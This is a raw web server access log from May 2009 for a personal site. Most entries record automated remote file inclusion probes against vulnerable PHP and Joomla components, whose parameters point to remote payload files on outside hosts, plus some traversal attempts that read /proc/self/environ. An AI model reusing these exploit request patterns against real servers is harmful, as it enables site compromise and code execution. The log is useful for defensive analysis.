89.111.184.103 - - [05/May/2009:09:16:43 -0700] "GET /pollphp/textfile//admin/common.inc.php?base_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.90.162 - - [05/May/2009:09:16:43 -0700] "GET /pollphp/textfile//admin/common.inc.php?base_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:09:16:49 -0700] "GET /logs/access_090220.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.217.216.86 - - [05/May/2009:09:16:49 -0700] "GET /logs/access_081012.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://202.91.74.136/bjp3//id3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:49 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:49 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:49 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:50 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [05/May/2009:09:16:50 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:16:55 -0700] "GET /logs/access_080403.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:16:55 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:16:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:57 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:57 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:57 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:16:57 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:09:17:03 -0700] "GET /pollphp/textfile//admin/common.inc.php?base_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:03 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:03 -0700] "GET /logs/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:03 -0700] "GET /logs/access_090112.log/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:06 -0700] "GET /errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:17:10 -0700] "GET /errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:17:10 -0700] "GET /logs/access_080821.log/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:17:10 -0700] "GET /logs/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:09:17:13 -0700] "GET /pollphp/textfile//admin/common.inc.php?base_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:17:13 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
168.143.19.89 - - [05/May/2009:09:17:15 -0700] "GET /index.php?content=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 200 42979 "-" "libwww-perl/5.825" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:23 -0700] "GET /logs/?path%5Bdocroot%5D=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 200 98189 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:25 -0700] "GET /logs/access_080430.log/?path%5Bdocroot%5D=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:17:28 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:17:28 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:17:28 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.116.168.108 - - [05/May/2009:09:17:28 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:32 -0700] "GET /logs/access_080304.log/?path%5Bdocroot%5D=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:17:32 -0700] "GET /logs/?path%5Bdocroot%5D=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 200 98189 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:17:33 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:17:33 -0700] "GET /logs/access_080210.log%20%20//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:17:33 -0700] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.112.152 - - [05/May/2009:09:17:36 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://colegiopenacorada.com/xoops_lib/modules/kangkung.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
118.219.232.137 - - [05/May/2009:09:17:39 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.sunggong.tv/data/shirohige/fxid.txt?? HTTP/1.1" 200 43089 "-" "Mozilla/5.0" "www.dmulk.com"
74.54.241.100 - - [05/May/2009:09:17:39 -0700] "GET /logs/access_081222.log%20%20/errors.php?error=http://www.mjswimgear.dk/joomla/media/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.111.184.103 - - [05/May/2009:09:17:44 -0700] "GET /logs/access_090101.log//pollphp/textfile//admin/common.inc.php?base_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:17:44 -0700] "GET /logs/access_080118.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:17:44 -0700] "GET /logs/access_080124.log///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:17:44 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 98195 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:17:49 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:17:49 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:17:49 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:17:49 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:09:17:58 -0700] "GET /logs/access_080118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.44.45 - - [05/May/2009:09:17:58 -0700] "GET /logs/access_080124.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:18:00 -0700] "GET /?path%5Bdocroot%5D=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.55.226 - - [05/May/2009:09:18:10 -0700] "GET /logs/access_090123.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
80.23.181.2 - - [05/May/2009:09:18:10 -0700] "GET /logs/access_080227.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://genericshears.com/blog/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.23.181.2 - - [05/May/2009:09:18:10 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://genericshears.com/blog/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.23.181.2 - - [05/May/2009:09:18:10 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]]=http://genericshears.com/blog/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.55.226 - - [05/May/2009:09:18:15 -0700] "GET /logs/access_090123.log/errors.php?error=http://www.fmf2004.hu/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
77.221.130.6 - - [05/May/2009:09:18:20 -0700] "GET /logs/access_090101.log//pollphp/textfile//admin/common.inc.php?base_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.55.226 - - [05/May/2009:09:18:21 -0700] "GET /logs/access_090123.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
217.199.222.19 - - [05/May/2009:09:18:22 -0700] "GET /ashnews.php?pathtoashnews=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.199.222.19 - - [05/May/2009:09:18:22 -0700] "GET /logs/access_080508.log//ashnews.php?pathtoashnews=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.199.222.19 - - [05/May/2009:09:18:22 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:18:23 -0700] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:18:23 -0700] "GET /logs/access_080210.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:18:23 -0700] "GET /index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.62.61.45 - - [05/May/2009:09:18:25 -0700] "GET /logs/access_081010.log/errors.php?error=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.55.226 - - [05/May/2009:09:18:26 -0700] "GET /logs/access_090123.log//contenido/cronjobs/move_articles.php?cfg[path][contenido]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
217.199.222.19 - - [05/May/2009:09:18:26 -0700] "GET /logs/access_080518.log//ashnews.php?pathtoashnews=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:18:26 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:18:26 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:18:26 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:18:26 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.197.202.64 - - [05/May/2009:09:18:28 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.197.202.64 - - [05/May/2009:09:18:28 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.197.202.64 - - [05/May/2009:09:18:28 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.197.202.64 - - [05/May/2009:09:18:28 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:09:18:35 -0700] "GET /logs/access_090410.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.94.148.39 - - [05/May/2009:09:18:35 -0700] "GET /logs/access_090407.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://srcdirc.my-php.net/fxtool/fxtool/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:18:40 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:18:41 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:18:41 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:18:41 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.202.134 - - [05/May/2009:09:18:41 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:18:42 -0700] "GET /logs/access_081008.log%20%20//index.php?DOCUMENT_ROOT=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:18:55 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.32.100.130 - - [05/May/2009:09:19:03 -0700] "GET /?path%5Bdocroot%5D=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
81.94.239.16 - - [05/May/2009:09:19:12 -0700] "GET /logs/access_080806.log//index.php?content=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:19:13 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
81.94.239.16 - - [05/May/2009:09:19:17 -0700] "GET /logs//index.php?content=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:19:25 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [05/May/2009:09:19:28 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:19:30 -0700] "GET /logs/access_081222.log/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.78.70.9 - - [05/May/2009:09:19:30 -0700] "GET /logs/access_090101.log//pollphp/textfile//admin/common.inc.php?base_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:19:31 -0700] "GET /logs/access_081222.log%20%20/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:19:31 -0700] "GET /logs/access_081222.log%20%20/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.226.153.1 - - [05/May/2009:09:19:38 -0700] "GET /logs/access_080628.log//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [05/May/2009:09:19:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:19:52 -0700] "GET /logs/access_081222.log/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:19:57 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.65.56 - - [05/May/2009:09:19:57 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:19:58 -0700] "GET /logs/access_080515.log%20%20/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:19:58 -0700] "GET /errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:19:58 -0700] "GET /logs/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:09:19:59 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:09:19:59 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:09:19:59 -0700] "GET /logs/access_080719.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
86.122.170.50 - - [05/May/2009:09:19:59 -0700] "GET /logs/access_081201.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.197.202.64 - - [05/May/2009:09:19:59 -0700] "GET /logs/access_081201.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.197.202.64 - - [05/May/2009:09:19:59 -0700] "GET /logs/access_080719.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.94.239.16 - - [05/May/2009:09:20:00 -0700] "GET /index.php?content=http://www.kimstroy.by//assets/images/pit-id.txt?? HTTP/1.1" 500 292 "-" "libwww-perl/5.79" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:20:08 -0700] "GET /logs/access_080118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.197.128.4 - - [05/May/2009:09:20:08 -0700] "GET /logs/access_080124.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:20:12 -0700] "GET /logs/access_080515.log%20%20/errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [05/May/2009:09:20:12 -0700] "GET /errors.php?error=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
